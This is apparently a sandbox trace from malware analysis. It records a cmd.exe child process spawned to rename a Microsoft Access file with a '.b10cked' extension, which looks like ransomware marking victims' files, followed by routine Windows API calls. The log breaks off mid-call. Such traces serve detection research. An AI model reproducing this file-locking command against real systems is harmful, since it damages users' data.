os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29226 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29227 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29228 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29229 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 29230 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29231 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29232 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" 
(normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29233 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29234 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 29235 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29578 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29579 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29580 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 29581 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29582 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 29583 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29584 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29585 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: 
"c:\\windows\\system32\\lpk.dll") Region: id = 29586 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29587 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29588 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29589 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29590 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29591 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29636 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 29637 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29638 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29639 start_va = 0x150000 end_va = 0x156fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 29640 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 29641 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 29642 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 29643 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 29644 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 29645 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 29685 start_va = 0x12c0000 end_va = 0x137ffff entry_point = 0x12c0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 660 os_tid = 0xcd8 [0201.689] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f994 | out: lpSystemTimeAsFileTime=0x14f994*(dwLowDateTime=0xad077200, dwHighDateTime=0x1d440a9)) [0201.689] GetCurrentProcessId () returned 0xcfc [0201.689] GetCurrentThreadId () returned 0xcd8 [0201.689] GetTickCount () returned 0x38f34 [0201.689] QueryPerformanceCounter (in: lpPerformanceCount=0x14f98c | out: lpPerformanceCount=0x14f98c*=25847795626) returned 1 [0201.690] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0201.690] __set_app_type (_Type=0x1) [0201.690] __p__fmode () returned 0x76b331f4 [0201.690] __p__commode () returned 0x76b331fc [0201.690] SetUnhandledExceptionFilter 
(lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0201.690] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0201.690] GetCurrentThreadId () returned 0xcd8 [0201.690] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcd8) returned 0x38 [0201.690] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.690] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0201.690] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.714] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.714] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f924 | out: phkResult=0x14f924*=0x0) returned 0x2 [0201.714] VirtualQuery (in: lpAddress=0x14f95b, lpBuffer=0x14f8f4, dwLength=0x1c | out: lpBuffer=0x14f8f4*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.715] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f8f4, dwLength=0x1c | out: lpBuffer=0x14f8f4*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0201.715] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f8f4, dwLength=0x1c | out: lpBuffer=0x14f8f4*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0201.715] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f8f4, dwLength=0x1c | out: lpBuffer=0x14f8f4*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.715] VirtualQuery (in: 
lpAddress=0x150000, lpBuffer=0x14f8f4, dwLength=0x1c | out: lpBuffer=0x14f8f4*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0201.715] GetConsoleOutputCP () returned 0x1b5 [0201.717] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.717] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0201.717] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.717] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0201.719] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.719] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.720] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.720] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.724] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.724] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.726] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.726] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0201.743] GetEnvironmentStringsW () returned 0x1a0188* [0201.743] FreeEnvironmentStringsW (penv=0x1a0188) returned 1 [0201.743] GetEnvironmentStringsW () returned 0x1a0188* [0201.743] FreeEnvironmentStringsW (penv=0x1a0188) returned 1 [0201.743] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e894 | out: phkResult=0x14e894*=0x40) returned 0x0 [0201.743] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x0, lpData=0x14e8a0*=0xb0, lpcbData=0x14e898*=0x1000) returned 0x2 [0201.743] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: 
lpType=0x14e89c*=0x4, lpData=0x14e8a0*=0x1, lpcbData=0x14e898*=0x4) returned 0x0 [0201.743] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x0, lpData=0x14e8a0*=0x1, lpcbData=0x14e898*=0x1000) returned 0x2 [0201.743] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x4, lpData=0x14e8a0*=0x0, lpcbData=0x14e898*=0x4) returned 0x0 [0201.743] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x4, lpData=0x14e8a0*=0x40, lpcbData=0x14e898*=0x4) returned 0x0 [0201.743] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x4, lpData=0x14e8a0*=0x40, lpcbData=0x14e898*=0x4) returned 0x0 [0201.743] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x0, lpData=0x14e8a0*=0x40, lpcbData=0x14e898*=0x1000) returned 0x2 [0201.743] RegCloseKey (hKey=0x40) returned 0x0 [0201.743] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e894 | out: phkResult=0x14e894*=0x40) returned 0x0 [0201.744] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x0, lpData=0x14e8a0*=0x40, lpcbData=0x14e898*=0x1000) returned 0x2 [0201.744] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x4, lpData=0x14e8a0*=0x1, lpcbData=0x14e898*=0x4) 
returned 0x0 [0201.744] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x0, lpData=0x14e8a0*=0x1, lpcbData=0x14e898*=0x1000) returned 0x2 [0201.744] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x4, lpData=0x14e8a0*=0x0, lpcbData=0x14e898*=0x4) returned 0x0 [0201.744] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x4, lpData=0x14e8a0*=0x9, lpcbData=0x14e898*=0x4) returned 0x0 [0201.744] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x4, lpData=0x14e8a0*=0x9, lpcbData=0x14e898*=0x4) returned 0x0 [0201.744] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e89c, lpData=0x14e8a0, lpcbData=0x14e898*=0x1000 | out: lpType=0x14e89c*=0x0, lpData=0x14e8a0*=0x9, lpcbData=0x14e898*=0x1000) returned 0x2 [0201.744] RegCloseKey (hKey=0x40) returned 0x0 [0201.744] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a3 [0201.744] srand (_Seed=0x5b8863a3) [0201.744] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.14.1033.hxn.b10cked\"" [0201.744] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.14.1033.hxn.b10cked\"" [0201.744] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.745] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a18e8, nSize=0x104 | out: 
lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0201.745] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0201.745] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0201.745] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.745] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0201.745] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0201.745] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0201.745] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0201.745] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0201.745] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0201.745] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0201.745] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0201.745] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0201.745] GetEnvironmentStringsW () returned 0x1a22d8* [0201.745] FreeEnvironmentStringsW (penv=0x1a22d8) returned 1 [0201.745] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.745] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.745] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0201.746] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0201.746] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0201.746] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 
[0201.746] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0201.746] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0201.746] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0201.746] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0201.746] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f660 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.746] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f660, lpFilePart=0x14f65c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f65c*="Desktop") returned 0x18 [0201.746] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.746] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f3dc | out: lpFindFileData=0x14f3dc) returned 0x1a0018 [0201.746] FindClose (in: hFindFile=0x1a0018 | out: hFindFile=0x1a0018) returned 1 [0201.746] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f3dc | out: lpFindFileData=0x14f3dc) returned 0x1a0018 [0201.746] FindClose (in: hFindFile=0x1a0018 | out: hFindFile=0x1a0018) returned 1 [0201.747] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f3dc | out: lpFindFileData=0x14f3dc) returned 0x1a0018 [0201.747] FindClose (in: hFindFile=0x1a0018 | out: hFindFile=0x1a0018) returned 1 [0201.747] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.747] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0201.747] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0201.747] GetEnvironmentStringsW () returned 0x1a2af8* [0201.747] FreeEnvironmentStringsW (penv=0x1a2af8) returned 1 [0201.747] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.748] GetConsoleOutputCP () returned 0x1b5 [0201.757] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.757] GetUserDefaultLCID () returned 0x409 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f7a0, cchData=128 | out: lpLCData="0") returned 2 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f7a0, cchData=128 | out: lpLCData="0") returned 2 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f7a0, cchData=128 | out: lpLCData="1") returned 2 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0201.762] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 
[0201.762] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0201.763] GetConsoleTitleW (in: lpConsoleTitle=0x1908e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.778] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.778] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0201.778] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0201.778] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0201.778] _wcsicmp (_String1="move", _String2=")") returned 68 [0201.779] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0201.779] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0201.779] _wcsicmp (_String1="IF", _String2="move") returned -4 [0201.779] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0201.779] _wcsicmp (_String1="REM", _String2="move") returned 5 [0201.779] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0201.781] GetConsoleTitleW (in: lpConsoleTitle=0x14f498, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.814] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0201.814] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0201.814] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0201.814] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0201.814] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0201.814] _wcsicmp (_String1="move", _String2="CD") returned 10 [0201.814] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0201.814] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0201.814] _wcsicmp (_String1="move", _String2="REN") returned -5 [0201.814] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0201.814] _wcsicmp (_String1="move", _String2="SET") returned -6 [0201.814] _wcsicmp (_String1="move", _String2="PAUSE") returned 
-3 [0201.814] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0201.814] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0201.814] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0201.814] _wcsicmp (_String1="move", _String2="MD") returned 11 [0201.814] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0201.814] _wcsicmp (_String1="move", _String2="RD") returned -5 [0201.814] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0201.814] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0201.814] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0201.814] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0201.814] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0201.814] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0201.814] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0201.814] _wcsicmp (_String1="move", _String2="VER") returned -9 [0201.814] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0201.814] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0201.814] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0201.814] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0201.814] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0201.814] _wcsicmp (_String1="move", _String2="START") returned -6 [0201.814] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0201.814] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0201.814] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0201.816] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.816] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.816] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f254, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f24c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f24c*=0x90c08a66, 
